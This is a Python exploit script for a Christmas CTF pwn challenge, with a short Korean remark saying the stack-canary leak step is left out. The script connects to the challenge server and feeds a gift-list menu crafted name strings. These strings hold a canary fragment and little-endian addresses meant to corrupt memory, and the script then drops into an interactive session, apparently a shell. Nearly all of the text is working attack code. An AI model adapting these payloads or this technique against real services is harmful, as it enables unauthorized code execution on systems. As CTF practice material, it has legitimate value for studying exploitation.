#!/usr/bin/python
from socket import *
from struct import pack,unpack
import time
import telnetlib
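# Endpoint the script connects to (hard-coded; used by create_connection below).
host = "prob2.christmasctf.com"
port = 11111
# Three bytes spliced verbatim into one of the name strings sent below; the
# page says how this value was obtained is omitted from the write-up.
canary = "\xab\x7e\x41" # server


def unp(x):
    """Decode a 4-byte little-endian unsigned integer from *x*.

    Replaces the previous ``unp = lambda ...`` assignment (PEP 8 E731) with
    a named function; behavior is unchanged. Raises struct.error if *x* is
    not exactly 4 bytes long.
    """
    return unpack("<L", x)[0]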
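def recv_until(s, param):
    """Read from socket *s* one byte at a time until *param* has been seen.

    Returns everything received, including the terminating *param*.
    Raises EOFError if the peer closes the connection before *param*
    arrives; the original loop treated an empty recv() as "keep waiting"
    and would spin forever on a closed socket.
    """
    data = ""
    while param not in data:
        chunk = s.recv(1)
        if not chunk:
            # recv() returning nothing means the connection is closed.
            raise EOFError("connection closed before %r was received" % (param,))
        data += chunk
    return data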
def InsertGiftList(s, name, num):
    """Drive menu option 1 on connection *s*.

    Sends "1", waits for the name prompt, sends *name* exactly as given
    (no newline is appended), waits for the gift prompt, then sends *num*
    followed by a newline. Returns None.
    """
    prompted_steps = (
        ("1\n", "Name? >>> "),
        (name, "Gift? >>> "),
    )
    for payload, prompt in prompted_steps:
        s.send(payload)
        recv_until(s, prompt)
    s.send(num + "\n")
def RemoveGiftList(s, name, num):
    """Drive menu option 2 on connection *s* and return the server's reply.

    Follows the same prompt sequence as the insert path ("2", *name* as
    given, *num* plus newline), waits for the "Removed : " marker, pauses
    0.5 s (presumably so the rest of the reply can arrive), then returns
    up to 24 bytes read after the marker.
    """
    for payload, prompt in (("2\n", "Name? >>> "), (name, "Gift? >>> ")):
        s.send(payload)
        recv_until(s, prompt)
    s.send(num + "\n")
    recv_until(s, "Removed : ")
    time.sleep(0.5)
    reply = s.recv(24)
    return reply
# --- main script: one session against host:port, driven in a fixed order ---
s = create_connection((host,port))
recv_until(s,"---> ")  # consume the banner up to the menu prompt
# Four inserts, each with a fixed 16-byte name string; the second one splices
# in `canary`. The meaning of the individual byte values is not documented
# on this page.
InsertGiftList(s,"0"*16,"-1")
InsertGiftList(s,"1" + canary + "aaaabbbbcccc","134514992")
InsertGiftList(s,"\xee\x94\x04\x08\xd2\x95\x04\x08\xa4\xb0\x04\x08\xee\x94\x04\x08","-1")
InsertGiftList(s,"\xf0\xff\xff\xff\x93\x8a\x04\x08eeee\xa4\xb0\x04\x08","-1")
# Remove the first entry; the 24-byte reply is stored but never read afterwards.
data = RemoveGiftList(s,"0"*16,"-1")
time.sleep(0.1)
s.send("1734437990\n")
# NOTE(review): Telnet(host, port) opens a second TCP connection that is
# immediately discarded when .sock is overwritten with s; telnetlib.Telnet()
# with no arguments would attach to s without the extra connection.
# telnetlib is deprecated and was removed in Python 3.13.
tn = telnetlib.Telnet(host,port)
tn.sock = s
tn.interact()  # hand the existing session over to an interactive terminal
stack canary를 얻어오는 과정이 생략되어있음. 바이너리 안에 파일을 읽고 그 내용을 출력하는 아주 기특한 함수가 있는데 그 함수를 이용했던 것으로 기억함.